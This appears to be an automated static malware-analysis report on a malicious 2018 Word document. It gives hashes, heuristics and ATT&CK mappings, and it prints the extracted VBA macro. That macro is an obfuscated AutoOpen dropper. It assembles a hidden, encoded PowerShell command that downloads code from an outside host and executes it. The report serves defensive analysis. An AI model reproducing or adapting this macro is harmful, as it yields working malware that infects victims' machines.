Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4153c71c8ff2957b…

MALICIOUS

Office (OLE)

283.0 KB Created: 2018-02-13 13:59:00 Authoring application: Microsoft Office Word First seen: 2018-02-19
MD5: d0c85598fd52856b53a57f5319fc1164 SHA-1: 3f0bcf9157b7d20022fe2effab241e0850bb9fc2 SHA-256: 4153c71c8ff2957b915cd632f53b6f782e465dfb445ef7fa5a93e8d017dbdfc6
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function, a critical indicator of malicious intent, to execute commands. The ClamAV detection and heuristic firings strongly suggest this document acts as a dropper for further malicious activity.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6449209-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6449209-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6270 bytes
SHA-256: c8f19aa8467d8a027627a5a7513d6db4f7fbdd236a1f2ed2ecf17c98525beea5
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "hometown"
Sub AutoOpen()
    Dim CM_LE As String
    EM_QB = Array("c", "x", "i", "d", "h", "r", "b", "t", "-", "l", "a", "y", "u", "s", "p", "e", "n", "o", " ", "w")
    Dim FT_RC As String
    FT_RC = "ZgB1AG4AYwB0AGkAbwBuACAAYQAoACQ"
    CM_LE = CM_LE + EM_QB(14)
    CM_LE = CM_LE + EM_QB(17)
    Dim HK_MI As String
    HK_MI = "AeAApAHsAcgBlAH"
    CM_LE = CM_LE + EM_QB(19)
    CM_LE = CM_LE + EM_QB(15)
    Dim FN_ND As String
    FN_ND = "QAdQByAG4AIABbAFMAeQBzAHQAZQBtAC4AVABl"
    CM_LE = CM_LE + EM_QB(5)
    CM_LE = CM_LE + EM_QB(13)
    Dim EL_TD As String
    EL_TD = "AHgAdAAu"
    CM_LE = CM_LE + EM_QB(4)
    CM_LE = CM_LE + EM_QB(15)
    Dim DO_LE As String
    DO_LE = "AEUAbgBjAG8AZABp"
    FP_MF = FP_MF & FT_RC & HK_MI & FN_ND & EL_TD & DO_LE
    CM_LE = CM_LE + EM_QB(9)
    CM_LE = CM_LE + EM_QB(9)
    Dim HO_TD As String
    HO_TD = "AG4AZwBdADoA"
    CM_LE = CM_LE + EM_QB(18)
    CM_LE = CM_LE + EM_QB(8)
    Dim EL_TH As String
    EL_TH = "OgBVAFQARgA4AC4ARw"
    CM_LE = CM_LE + EM_QB(19)
    CM_LE = CM_LE + EM_QB(2)
    Dim HL_SF As String
    HL_SF = "BlAHQAUwB0AHI"
    CM_LE = CM_LE + EM_QB(16)
    CM_LE = CM_LE + EM_QB(3)
    Dim FM_QB As String
    FM_QB = "AaQBuAGcAKABbAFMAeQBzAHQAZQBtAC"
    CM_LE = CM_LE + EM_QB(17)
    CM_LE = CM_LE + EM_QB(19)
    Dim AS_NC As String
    AS_NC = "4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIA"
    FP_MF = FP_MF & HO_TD & EL_TH & HL_SF & FM_QB & AS_NC
    CM_LE = CM_LE + EM_QB(13)
    CM_LE = CM_LE + EM_QB(7)
    Dim AP_KH As String
    AP_KH = "bwBtAEIAYQBzAGUANgA0AFMAdAByAGk"
    CM_LE = CM_LE + EM_QB(11)
    CM_LE = CM_LE + EM_QB(9)
    Dim FR_NA As String
    FR_NA = "AbgBnACgAJAB4ACkAKQB9A"
    CM_LE = CM_LE + EM_QB(15)
    CM_LE = CM_LE + EM_QB(18)
    Dim IR_RF As String
    IR_RF = "DsAaQBlAHgAIAAkACgAYQAgACQAKAAkACg"
    CM_LE = CM_LE + EM_QB(4)
    CM_LE = CM_LE + EM_QB(2)
    Dim BP_TF As String
    BP_TF = "AJAAoAGkAbgB2AG8AawBlAC0AdwBlAGIAcgBlAHEAdQ"
    CM_LE = CM_LE + EM_QB(3)
    CM_LE = CM_LE + EM_QB(3)
    Dim BO_OJ As String
    BO_OJ = "BlAHMAd"
    FP_MF = FP_MF & AP_KH & FR_NA & IR_RF & BP_TF & BO_OJ
    CM_LE = CM_LE + EM_QB(15)
    CM_LE = CM_LE + EM_QB(16)
    Dim GO_RD As String
    GO_RD = "AAgACcAaAB0A"
    CM_LE = CM_LE + EM_QB(18)
    CM_LE = CM_LE + EM_QB(8)
    Dim DO_TJ As String
    DO_TJ = "HQAcABz"
    CM_LE = CM_LE + EM_QB(15)
    CM_LE = CM_LE + EM_QB(1)
    Dim CT_MB As String
    CT_MB = "ADoALwAvAHUAcwBwAHIAZAA1ADEANQAwAGMAZ"
    CM_LE = CM_LE + EM_QB(15)
    CM_LE = CM_LE + EM_QB(0)
    Dim HS_PD As String
    HS_PD = "QBuAHQAcgBhAGwALgB0AGEAYgBsAGUALgBjAG8AcgBlAC4"
    CM_LE = CM_LE + EM_QB(12)
    CM_LE = CM_LE + EM_QB(7)
    Dim DK_MC As String
    DK_MC = "AdwBpAG4AZABvAHcAcwAuAG4AZQB0AC8AdwBhAHIAZQBoAG8Ad"
    FP_MF = FP_MF & GO_RD & DO_TJ & CT_MB & HS_PD & DK_MC
    CM_LE = CM_LE + EM_QB(2)
    CM_LE = CM_LE + EM_QB(17)
    Dim IM_ME As String
    IM_ME = "QBzAGUAP"
    CM_LE = CM_LE + EM_QB(16)
    CM_LE = CM_LE + EM_QB(14)
    Dim BR_PC As String
    BR_PC = "wAkAGYAaQBsAHQAZQByAD0AUABhAHI"
    CM_LE = CM_LE + EM_QB(17)
    CM_LE = CM_LE + EM_QB(9)
    Dim FO_TI As String
    FO_TI = "AdABpAHQAaQBvAG4ASwBlAHkAJQAyADAAZQBxACUAM"
    CM_LE = CM_LE + EM_QB(2)
    CM_LE = CM_LE + EM_QB(0)
    Dim CT_RE As String
    CT_RE = "gAwACUAMgA3A"
    CM_LE = CM_LE + EM_QB(11)
    CM_LE = CM_LE + EM_QB(18)
    Dim AT_RC As String
    AT_RC = "HMAdABhAGcAZQAlADIANwAmAC"
    FP_MF = FP_MF & IM_ME & BR_PC & FO_TI & CT_RE & AT_RC
    CM_LE = CM_LE + EM_QB(6)
    CM_LE = CM_LE + EM_QB(11)
    Dim CL_PF As String
    CL_PF = "QAUwBlAGwAZQBjAHQAPQBk"
    CM_LE = CM_LE + EM_QB(14)
    CM_LE = CM_LE + EM_QB(10)
    Dim FS_LH As String
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.